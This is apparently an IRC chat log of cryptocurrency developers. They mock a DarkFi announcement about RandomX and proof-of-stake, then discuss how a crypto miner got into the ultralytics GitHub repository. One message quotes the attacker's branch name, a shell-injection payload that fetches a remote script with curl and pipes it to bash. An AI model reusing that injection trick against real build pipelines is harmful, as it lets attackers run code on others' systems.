geonic“We use a mining algorithm called RandomX (Monero uses it as well).” sounds a bit like, “We use a painting technique called Cubism (Picasso used it as well).”
gingeropolous"By the time we released the first version of DarkFi in 2023, we realized:" ... wow. musta took some real thinking for these realizations.
gingeropolous"First, nodes must have stake at the genesis (or beginning) of the chain, so there must be some token predistribution. "
hycwhy does anyone need a stake at genesis?
hycoh, they're talking about PoS\
hycthe fact that they're still using twitter to announce this stuff is dismaying
hychm, cute. someone managed to push an executable xmrig binary to github as a blob ultralytics/ultralytics #18027
hycwow, performed by creating a branch with special characters in its name
sech1TLDR some of their scripts didn't escape characters and the attacker created a branch with the name "openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)"
hyctoo silly